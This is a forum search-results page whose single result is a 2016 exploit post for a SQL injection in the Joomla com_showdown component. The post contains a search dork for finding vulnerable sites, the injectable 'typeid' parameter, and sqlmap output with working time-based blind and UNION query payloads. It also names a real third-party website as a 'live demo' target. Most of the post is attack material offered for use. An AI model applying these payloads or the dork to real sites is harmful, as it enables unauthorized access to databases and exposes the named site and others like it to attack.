Jump to content

Search the Community

Showing results for tags 'joomla showdown'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Occupation


Interests


Biography


Location

Found 1 result

  1. ###################### # Exploit Title : Joomla com_showdown SQL injection Vulnerability # Exploit Author : xBADGIRL21 # Dork : inurl:index.php?option=com_showdown # version : 1.5.0 # Tested on: [ Windows 7 ] # skype:xbadgirl21 # Date: 2016/07/24 # video Proof : https://youtu.be/IglNYsDcV3g ###################### # [+] DESCRIPTION : ###################### # [+] an SQL injection been Detected in this Joomla components showdown after you add ['] or ["] to # [+] Vuln Target Parameter you will get error like : # [+] You have an error in your SQL syntax; check the manual that corresponds to your MySQL or # [+] You Will Notice a change in the Frontpage of the target . ###################### # [+] Poc : ###################### # [typeid] Get Parameter Vulnerable To SQLi # http://127.0.0.1/index.php?option=com_showdown&typeid=999999 [INJECT HERE] ###################### # [+] SQLmap PoC: ###################### # GET parameter 'typeid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] # # Parameter: typeid (GET) # Type: AND/OR time-based blind # Title: MySQL >= 5.0.12 AND time-based blind # Payload: option=com_showdown&typeid=11 AND SLEEP(5) # # Type: UNION query # Title: Generic UNION query (NULL) - 6 columns # Payload: option=com_showdown&typeid=11 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x71627a6b71,0x4d7254764c576b495a504e73726d636f6a65695971624f6f64424e6870 # 43554447614a527451564c,0x71706a7171),NULL-- LZga # --- # [12:59:46] [INFO] the back-end DBMS is MySQL # web server operating system: Linux Debian 6.0 (squeeze) # web application technology: PHP 5.2.6, Apache 2.2.16 # back-end DBMS: MySQL >= 5.0.12 # [12:59:46] [INFO] fetching database names # available databases [3]: ###################### # [+] Live Demo : ###################### # http://www.circuse.eu/index.php?option=com_showdown&typeid=11 ###################### # Discovered by : xBADGIRL21 # Greetz : All Mauritanien Hackers - NoWhere ###################### CommentsRSS Feed via
×
×
  • Create New...